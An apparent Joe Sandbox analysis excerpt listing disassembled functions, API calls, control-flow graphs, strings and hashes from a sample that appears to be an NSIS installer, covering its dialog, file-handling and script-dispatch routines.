                                                                                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                    Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                    Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405619 GetDlgItem * 2 call 403d3f KiUserCallbackDispatcher call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 83 40561e-405626 61->83 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 83->60 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                                                                    • String ID: @rD
                                                                                                                                    • API String ID: 3906175533-3814967855
                                                                                                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                    APIs
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                    Strings
                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                    Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                    • API String ID: 608394941-1650083594
                                                                                                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,134,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,134,134,00000000,00000000,134,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                    • String ID: 134$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                    • API String ID: 4286501637-3629710046
                                                                                                                                    • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                    • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                    Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                    Strings
